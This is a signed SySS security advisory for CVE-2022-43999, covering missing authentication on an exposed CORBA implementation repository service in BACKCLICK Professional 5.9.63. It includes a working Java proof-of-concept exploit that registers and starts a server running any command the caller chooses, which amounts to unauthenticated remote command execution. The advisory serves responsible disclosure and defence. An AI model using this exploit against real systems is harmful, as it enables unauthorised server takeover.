-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-034 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-306: Missing Authentication for Critical Function Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-43999 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see [1]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to exposed CORBA management services, arbitrary system commands can be executed on the server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Alongside the CORBA services internally used by the application, an implementation repository (IMR) service is exposed on port 65501. The initial object reference (IOR) required to address the service is predictable. That service allows dynamic activation of additional servers without authentication. An arbitrary system command can be specified for the server. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following Java exploit code uses the JacORB client library to invoke the IMR service, register and start a new server instance. The command line to be invoked can be specified. - ----- System.setProperty("org.omg.CORBA.ORBClass", "org.jacorb.orb.ORB"); System.setProperty("org.omg.CORBA.ORBSingletonClass", "org.jacorb.orb.ORBSingleton"); if ( args.length < 3 ) { System.out.println("ExploitJacorbIOR [ []]"); return; } String ip = args[0]; short port = (short) Integer.parseInt(args[1]); StringBuilder cmd = new StringBuilder(args[2]); for ( int i = 3; i < args.length; i++ ) { cmd.append(' '); cmd.append(args[i]); } // sane defaults String host = "localhost"; String key = "the_ImR/ImRPOA/ImR"; org.omg.CORBA.ORB orb = org.omg.CORBA.ORB.init(new String[0], null); // create suitable IOR IOR ior = new IOR(); ior.type_id = "IDL:org/jacorb/imr/ImplementationRepository:1.0"; CDROutputStream cds = (CDROutputStream) orb.create_output_stream(); cds.beginEncapsulatedArray(); ProfileBody_1_1 body = new ProfileBody_1_1(); body.iiop_version = new Version((byte)1,(byte)2); body.host = ip; body.port = (short)port; body.object_key = key.getBytes(StandardCharsets.UTF_8); body.components = new TaggedComponent[0]; ProfileBody_1_1Helper.write (cds, body); ior.profiles = new TaggedProfile[] { new TaggedProfile(TAG_INTERNET_IOP.value, cds.getBufferCopy()) }; String createdIOR = new ParsedIOR( (org.jacorb.orb.ORB)orb, ior).getIORString(); // dereference IOR Properties props = new Properties(); props.setProperty("ORBInitRef.ImplementationRepository", createdIOR); props.setProperty("jacorb.use_imr", "on"); orb = org.omg.CORBA.ORB.init((String[])args, props); Admin admin = AdminHelper.narrow(orb.resolve_initial_references("ImplementationRepository")); // use service to register and start server HostInfo[] hosts = admin.list_hosts(); if ( hosts.length > 0 ) { host = hosts[0].name; } try { ServerInfo i = null; try { i = admin.get_server_info("Exploit"); } catch( UnknownServerName e) {} if ( i != null ) { admin.unregister_server("Exploit"); } admin.register_server("Exploit", cmd.toString(), host); } catch ( Exception e ) { e.printStackTrace(); } admin.start_server("Exploit"); admin.unregister_server("Exploit"); - ---- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for BACKCLICK https://www.backclick.de/ [2] SySS Security Advisory SYSS-2022-034 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-034.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl PdoUcQgAmkLcYECw1WDOxDBfpVXz0ILf+nHb7BsNN4/j7Djv5e9suWItHReNzjUV hqHnZ04Fc5HEkv0gH3DNHd9BxrcI7OirOVaJc9knOBKF2fWLBhnm5TDffzO1axqt 4c/LA6SDmLCJZleAQr6L6/0SgJnsqwnsJcRQEdKKPzgLqSd6jSYJjCNhDm6hQ7Nr skRqhRl/l4bnQjSxOeNmmV+eh96YwvnLVOyszpG+P7f35x7GqoA4PGDJhHGcRGoD oNzPg+g9XkjEIO9I4aRjUswvkFiMnRvfRp97Dk5k2SFb3gD7mTFDEG4bjoIGJp2y lug968BHANY+Iy0HRNCOGN8ka7yYOQ== =XTDQ -----END PGP SIGNATURE-----